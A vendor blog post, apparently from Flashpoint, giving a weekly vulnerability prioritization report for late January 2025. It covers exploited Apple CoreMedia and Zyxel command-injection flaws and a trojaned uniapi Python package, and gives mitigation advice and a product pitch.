Blog

Flashpoint Weekly Vulnerability Insights and Prioritization Report

Anticipate, contextualize, and prioritize vulnerabilities to effectively address threats to your organization.

Default Author Image
February 5, 2025

The use of vulnerabilities as an initial access vector in threat actor campaigns is up by 180%, which means that it is more imperative than ever to build an effective prioritization plan. In this ongoing series, we dive into the vulnerabilities Flashpoint has identified as high priority, why they should be of focus, as well as provide analysis to help organizations make faster prioritization decisions for more-effective remediation.

With new vulnerability exploits and zero-days being discovered every day, having a proactive vulnerability management strategy is critical. By using this weekly report, security teams can adopt an intelligence-led approach for patch management—allowing organizations to implement timely remediation through comprehensive vulnerability intelligence.

Key Vulnerabilities:
Week of January 29, 2025

Foundational Prioritization

Of the vulnerabilities Flashpoint published this week, there are 172 that you can take immediate action on. They each have a solution, a public exploit exists, and are remotely exploitable. As such, these vulnerabilities are a great place to begin your prioritization efforts.

Image 1: Number of vulnerabilities published last week that have a publicly available exploit, are remotely exploitable and have a solution available. (Source: Flashpoint)

Diving Deeper – Urgent Vulnerabilities

Of the vulnerabilities Flashpoint published last week, three are highlighted in this week’s Vulnerability Insights and Prioritization Report because they all:

  • Are in widely used products and are potentially enterprise-affecting
  • Are exploited in the wild or have exploits available
  • Allow full system compromise
  • Can be exploited via the network alone or in combination with other vulnerabilities
  • Have a solution to take action on

In addition, all of these vulnerabilities are easily discoverable and therefore should be investigated and fixed immediately.

To proactively address these vulnerabilities and ensure comprehensive coverage beyond publicly available sources on an ongoing basis, organizations can leverage Flashpoint Vulnerability Intelligence. Flashpoint provides comprehensive coverage encompassing IT, OT, IoT, CoTs, and open-source libraries and dependencies. It catalogs over 100,000 vulnerabilities that are not included in the NVD or lack a CVE ID, ensuring thorough coverage beyond publicly available sources. The vulnerabilities that are not covered by the NVD do not yet have CVE ID assigned and will be noted with a VulnDB ID.

CVE IDTitleCVSS Scores (v2, v3, v4)Exploit StatusExploit ConsequenceRansomware Likelihood ScoreSocial Risk ScoreSolution Availability
CVE-2025-24085Apple Multiple Products CoreMedia Unspecified Use-After-Free7.2
7.8
8.5
Exploited in the wildLocal privilege escalationLowHighYes
CVE-2024-40890Zyxel Multiple Products HTTP Unspecified Remote Command Execution
10.0
9.8
9.3
Exploited in the wildRemote Privilege EscalationHighLowNo official patch exists. Take action to mitigate risk.
CVE-2024-40891Zyxel Multiple Products Telnet Unspecified Remote Command Execution10.0
9.8
9.3
Exploited in the wildRemote command executionMediumMediumNo official patch exists. Take action to mitigate risk.
VulnDB ID: 389414uniapi Package for Python __init__.py Malicious Code Remote Code Execution10.0
9.8
9.3
Exploited in the wildRemote code executionMediumPendingYes
Scores as of: February 5, 2025



NOTES: The severity of a given vulnerability score can change whenever new information becomes available. Flashpoint maintains its vulnerability database with the most recent and relevant information available. Login to view more vulnerability metadata and for the most up-to-date information.

CVSS scores: Our analysts calculate, and if needed, adjust NVD’s original CVSS scores based on new information being available.

Social Risk Score: Flashpoint estimates how much attention a vulnerability receives on social media. Increased mentions and discussions elevate the Social Risk Score, indicating a higher likelihood of exploitation. The score considers factors like post volume and authors, and decreases as the vulnerability’s relevance diminishes.

Ransomware Likelihood: This score is a rating that estimates the similarity between a vulnerability and those known to be used in ransomware attacks. As we learn more information about a vulnerability (e.g. exploitation method, technology affected) and uncover additional vulnerabilities used in ransomware attacks, this rating can change.

Unfortunately, as of February 5, 2025, Zyxel has not released an official patch or firmware update to fully address these vulnerabilities. This means your devices are potentially at risk, and it’s crucial to take action to mitigate the risk. Here’s a breakdown of what you can do:

  • Restrict Access to the Device’s Web Interface:
    • Firewall Rules: Configure your router’s firewall to only allow connections to the Zyxel device’s web interface from trusted IP addresses. This limits the attack surface significantly.
    • Disable Remote Management: If you don’t use remote management features, disable them. This reduces the potential entry points for attackers.
  • Monitor Network Traffic:
    • Intrusion Detection/Prevention Systems (IDS/IPS): If you have an IDS/IPS in your network, configure it to monitor for suspicious HTTP POST requests targeting your Zyxel CPE devices.
    • Analyze Logs: Regularly check your device logs and network traffic for any unusual activity, especially HTTP POST requests with unexpected commands.
  • Stay Informed:
    • Zyxel Website: Keep a close eye on Zyxel’s official website and security advisories for any updates or patches related to CVE-2024-40890.
    • Security News: Follow security news and vulnerability databases to stay informed about the latest developments and potential workarounds.
  • Consider Alternative Solutions:
    • Device Replacement: If your device is end-of-life and Zyxel is not providing updates, consider replacing it with a more secure device.
  • Important Notes:
    • Authentication Required: This vulnerability requires an attacker to be authenticated on the device. Ensure you are using strong and unique passwords.
    • Active Exploitation: CVE-2024-40890 is being actively exploited in the wild, so it’s crucial to take the mitigation steps mentioned above as soon as possible.

Key Takeaway:

While waiting for an official patch, the best course of action is to implement the mitigation strategies above to minimize the risk of exploitation. Remember that the ultimate solution is always to install the official patch from the vendor as soon as it becomes available.

Flashpoint Ignite lays all of these components out. Below is an example of what this vulnerability record for the Apple Multiple Products CoreMedia vulnerability looks like.



This record provides additional metadata like affected product versions, MITRE ATT&CK mapping, analyst notes, solution description, classifications, vulnerability timeline and exposure metrics, exploit references and more.

Analyst Comments on the Notable Vulnerabilities

Below, Flashpoint analysts describe the three vulnerabilities highlighted above as vulnerabilities that should be of focus for remediation if your organization is exposed.

CVE-2025-24085

The first is a critical zero-day vulnerability, in Apple’s Core Media, allowed attackers to control devices via a use-after-free error. Exploited in iOS versions before 17.2, it was addressed by Apple in the latest iOS and macOS updates:

CVE-2025-24085 is a zero-day vulnerability found in Apple’s Core Media component that could allow attackers to take control of vulnerable devices. Multiple Apple products contain an unspecified use-after-free error in the CoreMedia component triggered when certain input is not properly validated. This may allow a local attacker to de-reference already freed memory and execute arbitrary code with elevated privileges. This use-after-free vulnerability is being actively exploited in iOS versions before 17.2. As of January 27, it was reported as being exploited in the wild. Apple has addressed this issue by improving memory management in the latest iOS and macOS updates.

CVE-2024-40890 and CVE-2024-40891

The second, is one vulnerability in 2 different components of the Zyxel CPE devices which have command injection vulnerabilities (CVE-2024-40890, CVE-2024-40891) that allow attackers to execute commands. The vulnerabilities were reported as exploited in the wild as of January 28:

CVE-2024-40890 and CVE-2024-40891 are both command injection vulnerabilities affecting Zyxel CPE Series devices. These flaws allow attackers to execute arbitrary commands on vulnerable devices, potentially leading to complete system compromise, data exfiltration, or network infiltration. These vulnerabilities exist because the Zyxel devices fail to properly sanitize user inputs, allowing attackers to inject malicious commands that the device’s operating system will execute. As of January 28, they were reported as being exploited in the wild.

uniapi package for Python

The third, a Flashpoint exclusive vulnerability is a malicious uniapi Python package (version 1.0.7) allowed remote code execution and system information disclosure:

A uniapi package for Python that was reported to contain malicious code in “__init__.py” that allows a remote attacker to execute arbitrary code and disclose system information. The malicious code downloads and executes Python code, which sends system information to the attacker’s server. However, changes on the server may allow the execution of arbitrary code. Version 1.0.6 and prior are not affected by this issue. If a user has downloaded the trojaned distribution of version 1.0.7, their system is potentially compromised. The only way to ensure that it is completely safe is to reinstall the operating system and all applications.

Previously Highlighted Vulnerabilities

CVE/VulnDB IDName/TitleFlashpoint Published Date
CVE-2025-21218Microsoft Windows Kerberos Unspecified Application Handling Resource Consumption Remote DoSWeek of January 15, 2025
CVE-2024-57811Eaton XC-303 Hardcoded CredentialsWeek of January 15, 2025
CVE-2024-55591Fortinet FortiOS (FortiGate) / FortiProxy Node.js WebSocket Module Improper Authentication Remote Authentication BypassWeek of January 15, 2025
CVE-2025-23006SonicWall SMA1000 Unspecified Insecure DeserializationWeek of January 22, 2025
CVE-2025-20156Cisco Meeting Management (CMM) Unspecified REST API Endpoint Improper Authorization API Request HandlingWeek of January 22, 2025
CVE-2024-50664GPAC isomedia/sample_descs.c gf_isom_new_mpha_description() Function MPEGH Audio Configuration Handling Heap Buffer OverflowWeek of January 22, 2025

Transform Vulnerability Management with Flashpoint

Fill out the form to the left to subscribe to our newsletter, which features Flashpoint’s leading data and intelligence. Request a demo today to see how Flashpoint can transform your vulnerability management and exposure identification program.

See Flashpoint in Action